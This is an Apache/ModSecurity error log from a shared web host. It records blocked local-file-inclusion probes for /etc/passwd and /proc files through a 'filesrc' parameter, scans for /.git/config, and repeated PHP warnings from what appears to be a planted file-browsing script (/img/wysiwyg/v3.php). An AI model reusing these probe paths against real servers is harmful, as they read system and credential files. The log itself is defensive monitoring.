[Tue May 12 00:25:01.391092 2026] [security2:error] [pid 1601130:tid 1601161] [client 216.73.216.110:58083] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/net/udp found within ARGS:filesrc: /proc/net/udplite6"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJXPXEgAO_835W6c1nAXQAAAEs"]
[Tue May 12 00:25:01.391709 2026] [security2:error] [pid 1601130:tid 1601161] [client 216.73.216.110:58083] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJXPXEgAO_835W6c1nAXQAAAEs"]
[Tue May 12 00:25:01.451087 2026] [security2:error] [pid 1601130:tid 1601161] [client 216.73.216.110:58083] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJXPXEgAO_835W6c1nAXQAAAEs"]
[Tue May 12 00:25:39.054790 2026] [security2:error] [pid 1590352:tid 1590400] [client 43.157.95.131:48312] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/wc/feed/"] [unique_id "agJXY61q0G_aXAqWauQkPwAAAIg"]
[Tue May 12 00:25:45.128008 2026] [security2:error] [pid 1606352:tid 1606431] [client 95.164.69.99:56082] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: bfec2c44fae9c355ecb525bfb66e34bc||1778540128||1778539768"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJXaXo_DFxNSZVmaX34zAAAAMw"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 00:25:45.131296 2026] [security2:error] [pid 1606352:tid 1606431] [client 95.164.69.99:56082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJXaXo_DFxNSZVmaX34zAAAAMw"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 00:25:45.132532 2026] [security2:error] [pid 1606352:tid 1606431] [client 95.164.69.99:56082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJXaXo_DFxNSZVmaX34zAAAAMw"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 00:26:01.450862 2026] [security2:error] [pid 1588898:tid 1588906] [client 43.155.188.157:59150] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJXeaFW67LJTsgN3jQ2wgAAAAc"]
[Tue May 12 00:26:34.631079 2026] [security2:error] [pid 1605480:tid 1605523] [client 43.134.1.185:51214] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-json/wp/v2/posts/1997"] [unique_id "agJXmh2Cvzd_nyNfUm8ogwAAAQE"]
[Tue May 12 00:26:41.692750 2026] [security2:error] [pid 1605480:tid 1605528] [client 170.106.37.134:33564] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJXoR2Cvzd_nyNfUm8okQAAAQY"]
[Tue May 12 00:26:47.059176 2026] [authz_core:error] [pid 1630927:tid 1630930] [client 47.128.125.51:65066] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/error_log
[Tue May 12 00:26:50.259283 2026] [authz_core:error] [pid 1588898:tid 1588900] [client 216.73.216.110:4130] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/Twig/error_log
PHP Warning:  filesize(): stat failed for /proc/222/task/222/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/222/task/222/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/222/task/222/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/222/task/222/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/222/task/222/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/222/task/222/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:27:07.462127 2026] [security2:error] [pid 1601130:tid 1601171] [client 43.134.141.244:60590] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/informatique/realisations/dark-light-theme-for-home-assistant/"] [unique_id "agJXu3EgAO_835W6c1nBRAAAAFU"]
[Tue May 12 00:27:27.162412 2026] [security2:error] [pid 1588898:tid 1589210] [client 54.91.164.107:44542] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agJXz6FW67LJTsgN3jQ3ygAAABU"]
[Tue May 12 00:27:27.162931 2026] [security2:error] [pid 1588898:tid 1589210] [client 54.91.164.107:44542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agJXz6FW67LJTsgN3jQ3ygAAABU"]
[Tue May 12 00:27:27.163336 2026] [security2:error] [pid 1588898:tid 1589210] [client 54.91.164.107:44542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agJXz6FW67LJTsgN3jQ3ygAAABU"]
[Tue May 12 00:28:03.151624 2026] [authz_core:error] [pid 1605480:tid 1605539] [client 47.128.126.118:13604] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/interactivity-api/error_log
[Tue May 12 00:28:39.243067 2026] [security2:error] [pid 1590352:tid 1590402] [client 216.73.216.110:47372] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:filesrc: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJYF61q0G_aXAqWauQlEQAAAIo"]
[Tue May 12 00:28:39.244115 2026] [security2:error] [pid 1590352:tid 1590402] [client 216.73.216.110:47372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJYF61q0G_aXAqWauQlEQAAAIo"]
[Tue May 12 00:28:39.348240 2026] [security2:error] [pid 1590352:tid 1590402] [client 216.73.216.110:47372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJYF61q0G_aXAqWauQlEQAAAIo"]
[Tue May 12 00:28:45.991117 2026] [security2:error] [pid 1590352:tid 1590404] [client 34.150.154.168:43142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJYHa1q0G_aXAqWauQlFgAAAIw"]
[Tue May 12 00:28:45.991354 2026] [security2:error] [pid 1590352:tid 1590404] [client 34.150.154.168:43142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJYHa1q0G_aXAqWauQlFgAAAIw"]
[Tue May 12 00:28:45.991860 2026] [core:error] [pid 1590352:tid 1590404] [client 34.150.154.168:43142] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:28:45.993428 2026] [security2:error] [pid 1590352:tid 1590404] [client 34.150.154.168:43142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJYHa1q0G_aXAqWauQlFgAAAIw"]
[Tue May 12 00:28:54.017535 2026] [security2:error] [pid 1601130:tid 1601152] [client 43.156.66.8:59286] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2021/09/MELIES-extrait-3.mp3"] [unique_id "agJYJXEgAO_835W6c1nBxAAAAEI"]
[Tue May 12 00:29:03.811734 2026] [ssl:error] [pid 1590352:tid 1590396] (EAI 2)Name or service not known: [client 3.254.163.128:47520] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:29:03.811778 2026] [ssl:error] [pid 1590352:tid 1590396] AH01941: stapling_renew_response: responder error
[Tue May 12 00:30:13.033294 2026] [core:error] [pid 1601130:tid 1601159] [client 34.162.126.124:47862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.033342 2026] [core:error] [pid 1601130:tid 1601159] [client 34.162.126.124:47862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.266713 2026] [core:error] [pid 1606352:tid 1606425] [client 34.162.126.124:47864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.266758 2026] [core:error] [pid 1606352:tid 1606425] [client 34.162.126.124:47864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.494235 2026] [core:error] [pid 1590352:tid 1590408] [client 34.162.126.124:47874] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.494268 2026] [core:error] [pid 1590352:tid 1590408] [client 34.162.126.124:47874] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.724828 2026] [core:error] [pid 1588898:tid 1588914] [client 34.162.126.124:47888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.724863 2026] [core:error] [pid 1588898:tid 1588914] [client 34.162.126.124:47888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.954321 2026] [core:error] [pid 1605480:tid 1605537] [client 34.162.126.124:47896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:13.954352 2026] [core:error] [pid 1605480:tid 1605537] [client 34.162.126.124:47896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:14.189976 2026] [core:error] [pid 1630927:tid 1630931] [client 34.162.126.124:47912] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:14.190028 2026] [core:error] [pid 1630927:tid 1630931] [client 34.162.126.124:47912] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 00:30:29.365576 2026] [security2:error] [pid 1590352:tid 1590414] [client 43.153.7.191:33032] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/emplacements-techniques-sonores/regie-50001/"] [unique_id "agJYha1q0G_aXAqWauQlgQAAAJY"]
[Tue May 12 00:30:37.151320 2026] [security2:error] [pid 1606352:tid 1606430] [client 102.165.1.99:45211] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJYjXo_DFxNSZVmaX36LgAAAMs"], referer: https://www.piregwan-genesis.com/
[Tue May 12 00:30:39.474584 2026] [security2:error] [pid 1590352:tid 1590394] [client 43.134.92.251:60880] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJYj61q0G_aXAqWauQljAAAAII"]
PHP Warning:  filesize(): stat failed for /proc/50/task/50/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/50/task/50/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/50/task/50/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/50/task/50/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/50/task/50/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/50/task/50/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:31:17.708900 2026] [security2:error] [pid 1588898:tid 1588905] [client 43.135.186.135:57734] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/embed/"] [unique_id "agJYtaFW67LJTsgN3jQ4vgAAAAY"]
[Tue May 12 00:31:26.025242 2026] [security2:error] [pid 1605480:tid 1605544] [client 43.157.98.187:46514] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/uploads/2019/08/FriandiseDF.zip"] [unique_id "agJYvh2Cvzd_nyNfUm8pwAAAARY"]
[Tue May 12 00:31:28.084073 2026] [security2:error] [pid 1590352:tid 1590392] [client 43.155.195.141:45954] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJYwK1q0G_aXAqWauQlvwAAAIA"]
PHP Warning:  filesize(): stat failed for /proc/696/task/696/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/696/task/696/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/696/task/696/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/696/task/696/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/696/task/696/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/696/task/696/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:32:12.465676 2026] [ssl:error] [pid 1605480:tid 1605533] (EAI 2)Name or service not known: [client 35.192.68.189:49602] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:32:12.465720 2026] [ssl:error] [pid 1605480:tid 1605533] AH01941: stapling_renew_response: responder error
